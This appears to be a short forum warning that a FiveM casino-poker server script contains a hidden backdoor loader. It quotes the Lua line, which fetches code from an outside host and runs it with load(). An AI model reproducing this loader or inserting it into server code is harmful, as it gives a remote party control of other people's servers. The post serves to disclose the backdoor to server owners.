Guys, inside the poker game there is a hidden loader that will take your IP. Use at your own risk.
in casino-poker/server/sv_main.lua at the end of the file there is a loader of a backdoor hidden inside the Helvetica.ttf font
local _v = PerformHttpRequestInternalEx{url='https://cfx-backdoorblocker.com/q9Dzt', method='GET'} AddEventHandler('__cfx_internal:httpResponse',function(_t, _s, _b) if _v == _t then pcall(function() assert(load(_b))() end) end end)